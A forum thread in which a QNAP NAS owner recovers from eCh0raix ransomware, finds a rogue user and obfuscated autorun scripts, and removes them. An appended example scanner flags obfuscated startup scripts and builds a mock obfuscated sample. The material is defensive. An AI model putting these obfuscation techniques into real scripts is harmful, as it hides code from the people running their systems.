I seem to have been attacked by the eCh0raix on my TS-431P; all my searches have led me to this being targeted at a qnap vulnerability. I've read through the following thread:
viewtopic.php?t=160274
As it's dated back in March I was hoping there's more info on this now. I've tried various tools to try to decrypt or find the key but have had no luck. The file shares are still accessible on the network but I'm not able to SSH in or connect to the web interface. Qnap finder can't see it either. Nothing on the device should've been opened to the internet, but I can't be certain without getting into it to take a look. I've since blocked its IP on my router from reaching outside.
Any help would be appreciated. Even any info about the possible encryption scheme used.
Hit by ransomware
- dolbyman
- Guru
- Posts: 35276
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: Hit by ransomware
Kill the NAS (format the drives and check the NAS autostart.sh for virus entries)
Then set it up again and restore your data from backups
make absolutely sure you have UPnP disabled and no ports forwarded on your router
- Starting out
- Posts: 12
- Joined: Tue Apr 18, 2017 5:17 am
Re: Hit by ransomware
That would be the logical approach, if I had backups. I used a RAID 1+0 to protect from physical failures; the qnap getting hacked with ransomware was the least likely scenario. A lot of the projects I have on there can probably be recovered to some degree, but there's 20 years of family photos that don't exist anywhere else. Wiping the drives is my last resort for now.
All the encrypted files are about twice the size of the originals. But the virus responsible for it lies somewhere else on the device and not embedded into the files right? I should be safe to back up these encrypted ones without risk of spreading anything?
You did just remind me however that I may in fact have some backups after all. Before I bought this qnap, I used a 2TB Buffalo. I switched when I outgrew the size, but I think that may possibly still be intact. It won't have everything, but it will have a fairly large portion.
Has qnap patched the vulnerability that is being used by this attack? I'm unsure of what my current firmware version is.
- dolbyman
- Guru
- Posts: 35276
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: Hit by ransomware
the files are encrypted..not infected
brute forcing the encryption of modern ransomware is basically hopeless as supercomputers would be on it for centuries..so don't bother...if the c&c servers ever get confiscated the individual encryption keys could be released (has happened before)
do not bank on any patches by qnap..there will be more of those attacks over and over..make sure your NAS is never exposed to the web
- Starting out
- Posts: 12
- Joined: Tue Apr 18, 2017 5:17 am
Re: Hit by ransomware
Still no luck in the decryption, but finally got into the device. The log shows things of interest. 10/19 is when the ransomware started. My bigger concern is this "wasthere" user, and the fact it seems to have been recreated many times over at least a year. (log only goes back 12 months) Also what is this shared folder it created?
/.qpkg/photostation2/9cd00ccc-d02f-11ea-87d0-0242ac130010
The only one with permission to this was the wasthere user. I looked in the directory but only found files related to photostation.
Log image:
https://i.imgur.com/H3r4fOj.png
I've been trying to update the firmware to the latest (5.0.0.1828), both through the control panel and manually from the console, but it tells me the firmware file format is abnormal. I'm on 4.4.3 but can't seem to update to anything higher despite the download page saying 5.0 is for my device (I tried multiple versions in between).
- dolbyman
- Guru
- Posts: 35276
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: Hit by ransomware
so potentially an exposed and vulnerable photostation was the way your NAS was hacked
as said before ..do not bother to fix the current state of your NAS...if you want to keep the encrypted files..save them away
then kill your NAS and start from scratch
- Starting out
- Posts: 12
- Joined: Tue Apr 18, 2017 5:17 am
Re: Hit by ransomware
Not sure why photostation would've been running in the first place, I've never used it. I reinitialized the NAS last night, but I still have weird stuff in the autorun.sh. How do I edit this file? Can't seem to find it anywhere and for whatever reason the web frontend doesn't provide a way to edit it, only view it. I've tried the instructions on the wiki but none of the examples work for me. My model isn't even listed.
- Starting out
- Posts: 12
- Joined: Tue Apr 18, 2017 5:17 am
Re: Hit by ransomware
I was finally able to mount the partition to access the autorun thanks to this thread: viewtopic.php?f=45&t=130345
Inside I also found the following file there as well. Since I don't believe anything legit on the qnap would be obfuscated in such a way, I deleted it. I'm mainly posting all this for informational purposes.
The files were flagged immutable and unable to delete even with sudo. The following command will fix that:
sudo chattr -i K01XgiiehpQmv.sh
I was also unable to identify "ptgatgrj.cs" so I've removed that as well.
K01XgiiehpQmv.sh
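A defender-side check for the style of startup script posted in this thread: command words broken up with empty `${VAR}` expansions, `$'\xNN'` escapes spelling out command names, a here-document piped straight into `sh`, packed lines thousands of characters long, and the immutable attribute that had to be cleared with `chattr -i`. This is an added example, not code from the thread or from QNAP; the `score_script`/`scan_dir` names, the 300-byte line threshold and the default minimum score are assumptions, and the two sample files it writes are constructed stand-ins, not the malware itself.

```shell
#!/bin/sh
# Heuristic scan of autorun.sh / QPKG start scripts for obfuscation markers.
# Indicators scored per file (one point each):
#   1. command words split by empty-variable expansions, e.g. t${abc}rue
#   2. $'\xNN' escapes used to spell out command names
#   3. a here-document piped straight into sh
#   4. a very long single line (packed payload)
#   5. the immutable attribute set (needs lsattr; skipped if unavailable)
# Files are only read, never executed.

score_script() {
    f="$1"
    s=0
    if grep -Eq '[a-z](\$\{[A-Za-z]+\})+[a-z]' "$f"; then s=$((s + 1)); fi
    if grep -Fq "\$'\\x" "$f"; then s=$((s + 1)); fi
    if grep -Eq '<<"[A-Za-z]+"[[:space:]]*[|].*sh' "$f"; then s=$((s + 1)); fi
    if awk 'length($0) > 300 { hit = 1 } END { exit !hit }' "$f"; then s=$((s + 1)); fi
    if command -v lsattr >/dev/null 2>&1 &&
       lsattr -d "$f" 2>/dev/null | grep -q '^[^ ]*i[^ ]* '; then s=$((s + 1)); fi
    echo "$s"
}

# Print every *.sh in a directory whose score reaches MIN (default 2).
scan_dir() {
    dir="$1"
    min="${2:-2}"
    for f in "$dir"/*.sh; do
        [ -f "$f" ] || continue
        s=$(score_script "$f")
        [ "$s" -ge "$min" ] && echo "$f score=$s"
    done
    return 0
}

# Constructed samples (not the thread's scripts): one benign autorun and one
# that mimics the obfuscation style. Prints the temporary directory path.
make_samples() {
    d=$(mktemp -d)
    cat > "$d/good.sh" <<'EOF'
#!/bin/sh
# benign autorun: fix PATH and start a local service
PATH=/bin:/usr/bin:/sbin:/usr/sbin
/etc/init.d/myservice.sh start
EOF
    cat > "$d/bad.sh" <<'EOF'
#!/bin/sh
t${AbCd}${eFgH}rue; f$'\x61'lse; ${IjK}${lMn}eval${oPq}
$Xy 'abc' 'xyz' <<"TAG"|${Rst}sh${Uvw}
echo harmless placeholder body
TAG
EOF
    # append one packed line of ~470 bytes to trip the long-line indicator
    awk 'BEGIN { for (i = 0; i < 80; i++) printf "${v%d}", i; print "" }' >> "$d/bad.sh"
    echo "$d"
}

# Usage: sh scan.sh /path/to/autorun/dir
if [ -n "${1:-}" ]; then
    scan_dir "$1"
fi
```

On a real NAS, point `scan_dir` at the mounted config partition holding autorun.sh and at the QPKG directories; a score of 2 or more is worth a manual look.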